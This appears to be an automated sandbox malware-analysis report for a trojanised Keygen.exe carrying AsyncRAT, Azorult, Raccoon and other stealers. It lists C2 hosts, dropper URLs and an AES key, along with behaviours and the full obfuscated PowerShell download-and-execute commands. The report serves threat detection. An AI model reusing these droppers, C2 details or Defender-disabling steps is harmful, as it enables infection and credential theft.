asyncrat | e446bd97230671b6e38682ec9f3da7527c18dbd555efc7f27a52d144cf54edcc

Analysis

max time kernel
85s
max time network
153s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon 5e4db353b88c002ba6466c06437973619aad03b3 discovery evasion infostealer rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 8 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral24/memory/4316-273-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral24/memory/4316-275-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/4632-278-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral24/memory/4632-279-0x0000000000403BEE-mapping.dmp	disable_win_def
C:\Windows\temp\r5e4qhbt.exe	disable_win_def
C:\Windows\Temp\r5e4qhbt.exe	disable_win_def
behavioral24/memory/4352-579-0x000000000040616E-mapping.dmp	disable_win_def
behavioral24/memory/5768-577-0x0000000000403BEE-mapping.dmp	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral24/memory/4432-263-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral24/memory/4432-264-0x000000000040C76E-mapping.dmp	asyncrat
behavioral24/memory/5708-570-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 2 IoCs

Processes:

resource	yara_rule
behavioral24/memory/2840-316-0x0000000004180000-0x00000000041DC000-memory.dmp	modiloader_stage1
behavioral24/memory/5908-613-0x00000000041E0000-0x000000000423C000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

17 3520 powershell.exe
18 3568 powershell.exe
19 2644 powershell.exe
22 3520 powershell.exe
24 3568 powershell.exe
25 2644 powershell.exe
Downloads MZ/PE file

flow	pid	process
17	3520	powershell.exe
18	3568	powershell.exe
19	2644	powershell.exe
22	3520	powershell.exe
24	3568	powershell.exe
25	2644	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

Keygen.exefot.exeiuy.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exefot.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exe0Zr1WB723b.exeErIxQphJLi.exeZvENb6ggC9.exelhIx28u9ZV.exe0Zr1WB723b.exeZvENb6ggC9.exelhIx28u9ZV.exer5e4qhbt.exe

pid	process
2584	Keygen.exe
5092	fot.exe
5084	iuy.exe
5112	igu.exe
4480	FGbfttrev.exe
4292	FGbfttrev.exe
4500	FDvbcgfert.exe
4544	FDvbcgfert.exe
4616	fot.exe
4648	igu.exe
4860	FGbfttrev.exe
4848	FGbfttrev.exe
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe
4564	0Zr1WB723b.exe
2840	ErIxQphJLi.exe
4412	ZvENb6ggC9.exe
4132	lhIx28u9ZV.exe
4432	0Zr1WB723b.exe
4316	ZvENb6ggC9.exe
4632	lhIx28u9ZV.exe
1512	r5e4qhbt.exe

Loads dropped DLL 14 IoCs

Processes:

FDvbcgfert.exeFDvbcgfert.exefot.exe

pid	process
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe
4616	fot.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

lhIx28u9ZV.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	lhIx28u9ZV.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	lhIx28u9ZV.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

fot.exe

description ioc process

File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini fot.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	fot.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

fot.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exe

pid	process
4616	fot.exe
4616	fot.exe
4648	igu.exe
4648	igu.exe
4860	FGbfttrev.exe
4848	FGbfttrev.exe
4860	FGbfttrev.exe
4848	FGbfttrev.exe
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe
4880	FDvbcgfert.exe
5024	FDvbcgfert.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

fot.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exe0Zr1WB723b.exeZvENb6ggC9.exelhIx28u9ZV.exe

description	pid	process	target process
PID 5092 set thread context of 4616	5092	fot.exe	fot.exe
PID 5112 set thread context of 4648	5112	igu.exe	igu.exe
PID 4292 set thread context of 4860	4292	FGbfttrev.exe	FGbfttrev.exe
PID 4480 set thread context of 4848	4480	FGbfttrev.exe	FGbfttrev.exe
PID 4500 set thread context of 4880	4500	FDvbcgfert.exe	FDvbcgfert.exe
PID 4544 set thread context of 5024	4544	FDvbcgfert.exe	FDvbcgfert.exe
PID 4564 set thread context of 4432	4564	0Zr1WB723b.exe	0Zr1WB723b.exe
PID 4412 set thread context of 4316	4412	ZvENb6ggC9.exe	ZvENb6ggC9.exe
PID 4132 set thread context of 4632	4132	lhIx28u9ZV.exe	lhIx28u9ZV.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FDvbcgfert.exeFDvbcgfert.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2288 timeout.exe
4416 timeout.exe
3756 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3300 taskkill.exe
3916 taskkill.exe
2392 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe

pid	process
2288	timeout.exe
4416	timeout.exe
3756	timeout.exe

pid	process
3300	taskkill.exe
3916	taskkill.exe
2392	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeZvENb6ggC9.exe

pid	process
3520	powershell.exe
2644	powershell.exe
2896	powershell.exe
192	powershell.exe
3568	powershell.exe
1272	powershell.exe
192	powershell.exe
1272	powershell.exe
192	powershell.exe
1272	powershell.exe
2896	powershell.exe
2896	powershell.exe
2644	powershell.exe
2644	powershell.exe
3568	powershell.exe
3520	powershell.exe
3568	powershell.exe
3520	powershell.exe
2644	powershell.exe
2896	powershell.exe
3520	powershell.exe
3568	powershell.exe
192	powershell.exe
1272	powershell.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

fot.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exe

pid process

5092 fot.exe
5112 igu.exe
4292 FGbfttrev.exe
4480 FGbfttrev.exe
4500 FDvbcgfert.exe
4544 FDvbcgfert.exe

pid	process
5092	fot.exe
5112	igu.exe
4292	FGbfttrev.exe
4480	FGbfttrev.exe
4500	FDvbcgfert.exe
4544	FDvbcgfert.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exe0Zr1WB723b.exeZvENb6ggC9.exelhIx28u9ZV.exeZvENb6ggC9.exepowershell.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	192	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	4564	0Zr1WB723b.exe
Token: SeDebugPrivilege	4412	ZvENb6ggC9.exe
Token: SeDebugPrivilege	4132	lhIx28u9ZV.exe
Token: SeDebugPrivilege	4316	ZvENb6ggC9.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	196	powershell.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

Keygen.exefot.exeigu.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeFDvbcgfert.exeZvENb6ggC9.exe

pid	process
2584	Keygen.exe
5092	fot.exe
5112	igu.exe
4480	FGbfttrev.exe
4292	FGbfttrev.exe
4500	FDvbcgfert.exe
4544	FDvbcgfert.exe
4316	ZvENb6ggC9.exe
4316	ZvENb6ggC9.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exefot.exeigu.exe

description	pid	process	target process
PID 2432 wrote to memory of 3456	2432	Keygen.exe	cmd.exe
PID 2432 wrote to memory of 3456	2432	Keygen.exe	cmd.exe
PID 2432 wrote to memory of 3456	2432	Keygen.exe	cmd.exe
PID 3456 wrote to memory of 2584	3456	cmd.exe	Keygen.exe
PID 3456 wrote to memory of 2584	3456	cmd.exe	Keygen.exe
PID 3456 wrote to memory of 2584	3456	cmd.exe	Keygen.exe
PID 3456 wrote to memory of 2800	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 2800	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 2800	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3840	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3840	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3840	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3756	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 3756	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 3756	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 2172	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 2172	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 2172	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 796	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 796	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 796	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 2288	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 2288	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 2288	3456	cmd.exe	timeout.exe
PID 3456 wrote to memory of 3880	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3880	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 3880	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 4056	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 4056	3456	cmd.exe	mshta.exe
PID 3456 wrote to memory of 4056	3456	cmd.exe	mshta.exe
PID 4056 wrote to memory of 1272	4056	mshta.exe	powershell.exe
PID 4056 wrote to memory of 1272	4056	mshta.exe	powershell.exe
PID 4056 wrote to memory of 1272	4056	mshta.exe	powershell.exe
PID 796 wrote to memory of 192	796	mshta.exe	powershell.exe
PID 796 wrote to memory of 192	796	mshta.exe	powershell.exe
PID 796 wrote to memory of 192	796	mshta.exe	powershell.exe
PID 3840 wrote to memory of 2896	3840	mshta.exe	powershell.exe
PID 3840 wrote to memory of 2896	3840	mshta.exe	powershell.exe
PID 3840 wrote to memory of 2896	3840	mshta.exe	powershell.exe
PID 3880 wrote to memory of 2644	3880	mshta.exe	powershell.exe
PID 3880 wrote to memory of 2644	3880	mshta.exe	powershell.exe
PID 3880 wrote to memory of 2644	3880	mshta.exe	powershell.exe
PID 2172 wrote to memory of 3568	2172	mshta.exe	powershell.exe
PID 2172 wrote to memory of 3568	2172	mshta.exe	powershell.exe
PID 2172 wrote to memory of 3568	2172	mshta.exe	powershell.exe
PID 2800 wrote to memory of 3520	2800	mshta.exe	powershell.exe
PID 2800 wrote to memory of 3520	2800	mshta.exe	powershell.exe
PID 2800 wrote to memory of 3520	2800	mshta.exe	powershell.exe
PID 3568 wrote to memory of 5084	3568	powershell.exe	iuy.exe
PID 3568 wrote to memory of 5084	3568	powershell.exe	iuy.exe
PID 3568 wrote to memory of 5084	3568	powershell.exe	iuy.exe
PID 2644 wrote to memory of 5092	2644	powershell.exe	fot.exe
PID 2644 wrote to memory of 5092	2644	powershell.exe	fot.exe
PID 2644 wrote to memory of 5092	2644	powershell.exe	fot.exe
PID 3520 wrote to memory of 5112	3520	powershell.exe	igu.exe
PID 3520 wrote to memory of 5112	3520	powershell.exe	igu.exe
PID 3520 wrote to memory of 5112	3520	powershell.exe	igu.exe
PID 5092 wrote to memory of 4292	5092	fot.exe	FGbfttrev.exe
PID 5092 wrote to memory of 4292	5092	fot.exe	FGbfttrev.exe
PID 5092 wrote to memory of 4292	5092	fot.exe	FGbfttrev.exe
PID 5112 wrote to memory of 4480	5112	igu.exe	FGbfttrev.exe
PID 5112 wrote to memory of 4480	5112	igu.exe	FGbfttrev.exe
PID 5112 wrote to memory of 4480	5112	igu.exe	FGbfttrev.exe
PID 5112 wrote to memory of 4544	5112	igu.exe	FDvbcgfert.exe

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B50D.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3456

C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exe
Keygen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2584

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520

C:\Users\Public\igu.exe
"C:\Users\Public\igu.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5112

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4480

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4848

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4544

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:5024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 5024 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\532779383507207\\* & exit
8⤵
PID:3084

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 5024
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Users\Public\igu.exe
"C:\Users\Public\igu.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4648

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3756

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568

C:\Users\Public\iuy.exe
"C:\Users\Public\iuy.exe"
5⤵
- Executes dropped EXE
PID:5084

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 